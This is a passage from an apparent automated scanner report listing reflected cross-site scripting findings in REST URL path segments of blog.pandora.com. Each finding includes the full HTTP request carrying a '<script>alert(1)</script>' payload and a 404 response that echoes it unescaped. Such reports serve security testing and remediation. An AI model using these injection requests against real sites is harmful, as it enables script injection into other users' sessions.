Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/06c3962<script>alert(1)</script>2bd69b3ec0b/ was not found on this server.</p>
...[SNIP]...

1.147. http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/07/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47138<script>alert(1)</script>a3f13374191 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora47138<script>alert(1)</script>a3f13374191/archives/2008/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:50 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora47138<script>alert(1)</script>a3f13374191/archives/2008/07/ was not found on this server.</p>
...[SNIP]...

1.148. http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/07/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e4152<script>alert(1)</script>d0196897ba0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivese4152<script>alert(1)</script>d0196897ba0/2008/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivese4152<script>alert(1)</script>d0196897ba0/2008/07/ was not found on this server.</p>
...[SNIP]...

1.149. http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/07/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 12ccb<script>alert(1)</script>30223f2cf54 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200812ccb<script>alert(1)</script>30223f2cf54/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200812ccb<script>alert(1)</script>30223f2cf54/07/ was not found on this server.</p>
...[SNIP]...

1.150. http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/07/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a9e3c<script>alert(1)</script>20dad2bc554 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/07a9e3c<script>alert(1)</script>20dad2bc554/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/07a9e3c<script>alert(1)</script>20dad2bc554/ was not found on this server.</p>
...[SNIP]...

1.151. http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/08/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 56d79<script>alert(1)</script>a4032462556 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora56d79<script>alert(1)</script>a4032462556/archives/2008/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora56d79<script>alert(1)</script>a4032462556/archives/2008/08/ was not found on this server.</p>
...[SNIP]...

1.152. http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/08/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25bf5<script>alert(1)</script>3d971d76d88 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives25bf5<script>alert(1)</script>3d971d76d88/2008/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:45 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives25bf5<script>alert(1)</script>3d971d76d88/2008/08/ was not found on this server.</p>
...[SNIP]...

1.153. http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/08/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5abe6<script>alert(1)</script>db42742e74 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20085abe6<script>alert(1)</script>db42742e74/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:47 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 348
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20085abe6<script>alert(1)</script>db42742e74/08/ was not found on this server.</p>
...[SNIP]...

1.154. http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/08/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 70934<script>alert(1)</script>e46d04bff1b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/0870934<script>alert(1)</script>e46d04bff1b/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/0870934<script>alert(1)</script>e46d04bff1b/ was not found on this server.</p>
...[SNIP]...

1.155. http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/09/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac95c<script>alert(1)</script>f39701078da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraac95c<script>alert(1)</script>f39701078da/archives/2008/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraac95c<script>alert(1)</script>f39701078da/archives/2008/09/ was not found on this server.</p>
...[SNIP]...

1.156. http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/09/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb2c5<script>alert(1)</script>2ae1ae68fdb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archiveseb2c5<script>alert(1)</script>2ae1ae68fdb/2008/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archiveseb2c5<script>alert(1)</script>2ae1ae68fdb/2008/09/ was not found on this server.</p>
...[SNIP]...

1.157. http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/09/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e57ea<script>alert(1)</script>aa701cd74e3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008e57ea<script>alert(1)</script>aa701cd74e3/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008e57ea<script>alert(1)</script>aa701cd74e3/09/ was not found on this server.</p>
...[SNIP]...

1.158. http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/09/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 500d6<script>alert(1)</script>b55ef145dcc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/09500d6<script>alert(1)</script>b55ef145dcc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/09500d6<script>alert(1)</script>b55ef145dcc/ was not found on this server.</p>
...[SNIP]...

1.159. http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/10/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 872c8<script>alert(1)</script>e32ca06f3d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora872c8<script>alert(1)</script>e32ca06f3d3/archives/2008/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora872c8<script>alert(1)</script>e32ca06f3d3/archives/2008/10/ was not found on this server.</p>
...[SNIP]...

1.160. http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/10/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 69a72<script>alert(1)</script>b4e2002f078 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives69a72<script>alert(1)</script>b4e2002f078/2008/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives69a72<script>alert(1)</script>b4e2002f078/2008/10/ was not found on this server.</p>
...[SNIP]...

1.161. http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/10/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c1a34<script>alert(1)</script>3e603248071 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008c1a34<script>alert(1)</script>3e603248071/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008c1a34<script>alert(1)</script>3e603248071/10/ was not found on this server.</p>
...[SNIP]...

1.162. http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/10/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ef2f7<script>alert(1)</script>b77f6aa2ff0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/10ef2f7<script>alert(1)</script>b77f6aa2ff0/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/10ef2f7<script>alert(1)</script>b77f6aa2ff0/ was not found on this server.</p>
...[SNIP]...

1.163. http://blog.pandora.com/pandora/archives/2008/11/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/11/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 685f7<script>alert(1)</script>b71e5ef0a26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora685f7<script>alert(1)</script>b71e5ef0a26/archives/2008/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
